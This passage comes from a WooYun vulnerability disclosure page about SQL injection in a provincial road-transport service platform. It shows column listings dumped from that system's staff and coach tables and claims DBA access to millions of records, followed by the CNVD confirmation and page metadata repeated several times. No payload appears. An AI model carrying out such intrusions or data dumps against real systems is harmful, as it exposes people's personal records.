| TRATIMES       | NUMBER   |
| YEARS          | CHAR     |
+----------------+----------+
Database: HYT2LINEHN
Table: STAFF_EDUCATION
[14 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| CARDNO           | VARCHAR2 |
| CARDTYPE         | VARCHAR2 |
| ENDDATE          | CHAR     |
| GRADUATIONID     | VARCHAR2 |
| HOURS            | NUMBER   |
| LEARNCONTENT     | VARCHAR2 |
| STAFFID          | VARCHAR2 |
| STARTDATE        | CHAR     |
| SYSOPERTIME      | NUMBER   |
| TITNO            | VARCHAR2 |
| TRAININGTECHER   | VARCHAR2 |
| TRAININSTITUTION | VARCHAR2 |
| TRAINRESULTS     | VARCHAR2 |
| WORTYPE          | VARCHAR2 |
+------------------+----------+
Database: HYT2LINEHN
Table: CLTSTAFF
[19 columns]
+-------------+-----------+
| Column      | Type      |
+-------------+-----------+
| CARDNO      | VARCHAR2  |
| CLTSTAFFID  | NVARCHAR2 |
| CMCLTID     | VARCHAR2  |
| CREDATE     | CHAR      |
| CRETIME     | CHAR      |
| CREUSRCODE  | VARCHAR2  |
| EDIDATE     | CHAR      |
| EDITIME     | CHAR      |
| EDIUSRCODE  | VARCHAR2  |
| EDUCATION   | VARCHAR2  |
| ISEFFECT    | NUMBER    |
| JOB         | NVARCHAR2 |
| NAME        | VARCHAR2  |
| REMARKDOC   | VARCHAR2  |
| SEX         | CHAR      |
| SPDMNO      | NVARCHAR2 |
| SYSOPERTIME | NUMBER    |
| TECCLASS    | VARCHAR2  |
| TITNO       | VARCHAR2  |
+-------------+-----------+

其余的数据库未进行测试，估计也得好几百万的数据信息记录吧！~~~用户，车辆信息也相信有很多，就不继续了，实在太慢了！~~~

漏洞证明：

如上

修复方案：

你们懂的！~~~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-11-24 17:34

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给吉林分中心，由吉林分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154453

漏洞标题：某省道路运输网上办事平台xml多处存在OR类型SQL注入（DBA权限+22个数据库+几百万记录+一万多教练信息）

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-11-20 20:16

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154453

漏洞标题：某省道路运输网上办事平台xml多处存在OR类型SQL注入（DBA权限+22个数据库+几百万记录+一万多教练信息）

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-11-20 20:16

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154453"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云